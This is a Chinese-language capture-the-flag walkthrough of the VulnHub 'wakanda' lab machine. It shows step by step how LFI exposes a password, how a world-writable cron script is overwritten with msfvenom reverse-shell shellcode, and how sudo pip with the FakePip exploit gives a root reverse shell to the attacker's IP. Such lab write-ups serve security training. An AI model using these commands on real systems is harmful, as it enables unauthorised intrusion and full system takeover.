wakanda靶机


安装

下载wakanda虚拟机.ova文件

下载地址:https://www.vulnhub.com/entry/wakanda-1,251/#download

导入 VirtualBox


攻击开始

攻击机:kali

被攻击机:wakanda

网络模式:桥接

获取靶机IP

  1. 查看kali攻击机IP

    1
    ifconfig

    1.png

  2. 使用netdiscover工具进行网络扫描,找到靶机IP地址

    1
    netdiscover -i eth0

    2.png

枚举和初步搜索信息

  1. 使用nmap进行全端口扫描

    1
    nmap -A -p- 192.168.43.57

    3.png

    靶机开放80(HTTP)、111(RPC)、3333(SSH)、57050(RPC)端口

  2. 访问80端口

    4.png

    无有用信息

  3. 使用dirb工具来进行目录遍历

    1
    dirb http://192.168.43.57

    5.png

  4. 访问扫描到的目录

    /admin/backup等目录,大小为0。

    查看index页面源码,在页面注释中发现了lang参数

    6.png

    ?lang=fr中,lang表示可切换的网站语言,fr表示法语。我们尝试在HTTP URL中添加这个参数,切换语言为法语

    7.png

利用LFI(本地文件包含漏洞)读取源码

  1. 使用PHP伪协议

    1
    http://192.168.43.57/?lang=php://filter/convert.base64-encode/resource=index

    8.png

    1
    PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=
  2. 对源码进行base64解码

    9.png

    获取到密码Niamey4Ever227!!!

    网站所有者为mamadou

    10.png

SSH登陆

  1. 尝试使用此账号密码(mamadouNiamey4Ever227!!!)登陆

    1
    ssh mamadou@192.168.43.57 -p 3333

    11.png

    得到了一个python 2.7.9命令提示符界面

  2. 使用python模块来进入系统的bash shell

    1
    2
    import pty
    pty.spawn("/bin/bash")

    12.png

  3. 查看mamadou用户的家目录,读取flag1.txt

    13.png

利用系统中的其他用户

  1. 查看系统中其他用户

    1
    cat /etc/passwd

    14.png

    发现devops用户,其家目录存在flag2.txt,但无访问权限

    15.png

  2. 目录遍历

    /tmp存在属主是devops用户的test文件

    16.png

    当前系统时间

    20.png

    相差时间较短,说明存在定时执行文件,定时修改/tmp/test文件内容

  3. 寻找定时任务文件

    查找属主是devops用户的文件

    1
    find / -user devops 2>/dev/null

    17.png

    发现.py文件

    18.png

    且权限为所有人可写入

建立反向shell

/srv/.antivirus.py中的内容为

19.png

/srv/.antivirus.py的作用是打开/tmp/test文件,并向其写入test

可以利用这个脚本,可以执行shellcode

  1. 生成shellcode

    1
    msfvenom -p cmd/unix/reverse_python lhost=192.168.43.250 lport=4444
  2. shellcode写入.py文件

    1
    nano /srv/.antivirus.py

    21.png

  3. 监听端口,等待反弹shell

    1
    nc -lvp 4444
  4. 获取devops用户shell

    等待几分钟后,系统定时执行/srv/.antivirus.py文件,执行shellcode,获取反弹shell

    22.png

  5. 读取flag2.txt

    23.png

提权

  1. 查看用户devopssudo权限

    1
    sudo -l

    24.png

    发现用户devops可无密码执行的sudo命令只有/usr/bin/pip

  2. 利用pip漏洞进行提权

    1. 攻击机下载exp

      1
      git clone https://github.com/0x00-0x00/FakePip.git

      25.png

    2. 攻击机修改exp

      26.png

      更改脚本中shell的反弹地址为kali的地址

    3. 攻击机利用python建立SimpleHTTPServer

      1
      python -m SimpleHTTPServer 8888

      27.png

      kali当前目录上运行了一个简易的HTTP服务器,在靶机上就可从这个HTTP服务器下载setup.py脚本

    4. 被攻击机下载提权脚本

      利用用户devops,下载脚本

      1
      2
      3
      mkdir fakepip
      cd fakepip
      wget http://192.168.43.250:8888/setup.py

      28.png

    5. kali中监听13372端口

      1
      nc -lvvp 13372
    6. 攻击机执行exp

      利用用户devops,执行脚本

      1
      sudo /usr/bin/pip install . --upgrade --force-reinstall

      29.png

    7. kali获取反弹shell

      30.png

      此为被攻击机root账户

查看最终flag

31.png

---------------The End---------------
0%